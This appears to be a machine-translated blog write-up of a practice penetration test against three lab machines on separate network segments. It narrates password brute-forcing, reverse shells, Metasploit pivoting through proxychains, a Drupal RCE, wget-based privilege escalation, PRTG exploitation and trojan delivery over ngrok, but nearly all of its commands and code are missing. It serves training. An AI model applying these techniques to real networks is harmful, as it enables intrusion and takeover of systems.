penetration test practice: multi network segment and multi scene target invasion practice

Posted by tzul at 2020-04-13


Hello everyone, I've been too busy to update the article for several months recently, but there are also many friends who recognize my brother's ID and avatar in their offline work and activities. Thank you very much for your attention to my article, and hope to write more and better in the future!!

This time, I have prepared three target machines, which span three different network segments, two Linux and one win2008. The attackers gradually invade and take authority, agent and complete all the intrusions (because my brother is in the working notebook environment, and the laptop performance is limited, so only three 3-layer network segments, in fact, the principle is the same, please forgive me).

Network topology

Scene 1:

Scene two:

Target drone Download

Target 1:

Target 2:

Target 3:

Note: after getting the root permission, the second layer of target machine partners need to use the root permission to add more network cards, and the system defaults to a network interface


First layer network environment

According to the old rule, first confirm the target IP, IP:, as shown in the figure:

We need to further explore the specific situation of the target. Because it is a target machine, we don't need to do a lot of information collection work, just nmap to detect the port,

We continue to use port 80 as a breakthrough,

Just a GIF. Let's run through the catalog,

One by one view

As shown in the figure above, Joomla is available. Let's use joomscan to scan it

As shown in the figure, there is no useful information

Let's focus on / Zorin and click on it one by one,

You can see two key points: '/ sentrifugo', and the initial default password is' tool '

My idea is to collect the user name, and blast the initial password,

The target machine is a 1985 007 movie. I collected the names of the people in the movie and made it into a dictionary. The movie reference address is

Now we start to burst the password, as shown in the figure:

Burst the default account password successfully: Bob – tool

Successfully log in SSH, as shown in the figure:

In the next step, we will continue to raise the right, as shown in the figure:

Check one by one:

Successfully obtained Jenny account password:!! sfbay!!!,

We're continuing to see / Max

You can see the "aview. Py" file in this directory. We can't view it,

Next, switch to the user Jenny because her permission is higher,

You can view this file successfully. Let's make a dictionary according to the "note. TXT" file. According to its rules, I am prompted to write a simple small program. The code is shown in the figure below:

Run the script and save it as the file "fuzzy. TXT"

Next, we hang up the dictionary according to its prompt and run port 8191 of the target. This time, I use burp to finish the task. You can also use the wfuzz tool, as shown in the figure:


Take a look

Isn't that the content of "aview. Py"? Let's modify that Python and confirm it

As shown in the figure, we have read and write permission. Please try to modify it

As you can see, there is no problem. Next, write the rebound shell directly, as shown in the figure:

Receive locally and get root permission successfully

(there is another solution for the target machine. Let's try it offline.)

Layer 2 network environment

Next, I am used to using MSF. Let's pop up a meterpreter permission, as shown in the figure:

Check the IP status,

We add routes,

After adding, let's do the following operation for Socks4 agent:

Next, I use proxychains to complete the following proxy work. The command operations are as follows:

sudo vim /etc/proxychains.conf

Note: IP here is the attacker IP,

Next, we need to test whether proxy penetration is successful. Just add "proxychains" before the normal command, as shown in the figure:

It can be seen that the proxy penetration is successful. As shown in the figure above, the second layer target machine has opened two ports, 22 and 80 respectively. According to the old rule, we still use port 80 as the breakthrough point to further penetrate. We open the browser to see that there is no need to set the proxy, just the following command:

The browser also proxy successfully, but there is no key page information. Let's run the directory

We found the / Drupal directory, and we continued to follow up,

If you find a sensitive user "James", keep it first, not necessarily later,

Let's continue with / robots.txt

To view version information:

As shown in the figure above, there is an rce vulnerability in this version. There have been many times in the previous articles of my younger brother. I will not introduce it here. This time, I will directly use MSF to complete the attack,


Using shell to operate


Everyone knows it's Base64 at a glance. Let's decrypt it

Get the password, but it doesn't seem to work, as shown in the figure

We continue

Seeing that WGet has root permission, our idea is the same as that in the previous article of my younger brother. We can forge a root like user directly, and WGet can directly replace the original file. The operation is as follows


Let's go to WGet, as shown below:

Switch users and get root permission successfully

In order to manage separately, I am used to playing a high permission shell, as shown in the figure:

End of target machine on the second floor

Layer 3 network environment

Next, I am used to using MSF. Let's pop up a meterpreter permission, as shown in the figure:

Check the IP status and add the route again

Continue to add to proxychains

Let's use nmap to detect the target

It can be seen that the target is windows 2008 system, and there are many ports open, and there are many intrusion methods, such as ms17-010, SSH blast, RDP blast, cve-2019-0708, etc. so here, because two environments are envisaged, I will use two methods to complete the intrusion work at will:

1、 Using PRTG to raise rights

Because it is open to 3389, I will log in first, and the command is as follows, as shown in the figure:

Because the target machine password is "vagrant", if I burst out the password of "Administrator" to log in, it's not interesting, so I'll use another account called "vagrant" to burst it, as shown in the figure:

Successful, our next step is to log in the account remotely to complete the authorization operation, as shown in the figure:

After logging in, I saw a good thing on the desktop, PRTG network monitor software, which is a well-known traffic monitoring software in foreign countries. This scenario simulates the deployment of a monitoring intranet sensitive server in a real environment that is not connected to the Internet, as shown in the figure:

Let's go

1. Judge the software version first, 18.1.37

Through version search, it can be found that there is a vulnerability. Let's manually verify the trigger and try it

Name at will

Next, I use nishang to make a TCP shell, as shown in the figure

Then upload the shell.ps1 to the controlled server on the second layer. (why do you want to control the upload to the second layer, guys? Because the third level goal of this scenario is only connected to the intranet and not connected to the Internet, we can only control the third level goal through the second level broiler) as shown in the figure below:

Then continue with the above operation

All ready, save, execute

On the controlled server of the second layer, you can see its HTTP request successfully

Let's see if the shell bounces back?

As shown in the figure above, you can see that we have successfully obtained the system permission shell.

(let's talk about it here. Sometimes in actual combat, if you operate and write in this way, there may be a case where the shell is downloaded, but it doesn't bounce back. Here's a solution for you. First, look at the following figure:

Command explanation: the first part of the command is to view shell.ps1 and pipe it to the second part. The second part of the command is to convert the file to the specified code and pipe it to the third part. The third part is Base64 encrypted. Then let's copy the following code, and finally let the target execute the command: PowerShell - enc xxxxx, as shown in the figure:


2、 Use ms16-075 to claim rights

This scenario assumes that after entering the third layer, the target machine can connect to the Internet. Then we use another method to get the system permission. All the above are the same. We first blow up its SSH handle, as shown in the figure:

Connect to SSH

Enter CMD, which is a common windows command-line interface. What we need to do next is to bounce back a shell to the attacker's computer. Here you can use the public network VPS, if not, or you can use ngrok / FRP, etc. I will use ngrok here,

The first step is to open the tunnel. This time, two tunnels are opened, one is to download trojan horse, the other is to receive shell, as shown in the figure;

Start to configure Trojans

Next, open the local HTTP to open the tunnel for downloading Trojans

Next, get through the receiving shell tunnel, MSF starts listening, waits for the connection of the target, connects SSH, and downloads the Trojan with the command

Next, connect SSH, use the command to download the Trojan horse, and run

The shell is back

Here we propose the right, and the figure below shows the loopholes that may be claimed

You can also use the project:

Or other power lifting search tools under the windows interface, there are many on the Internet, which are not available here.

Ms16-075 is selected to complete this time, as shown in the figure:

The right is raised successfully and the system permission is obtained successfully.

The end of the article. Thank you for watching!!!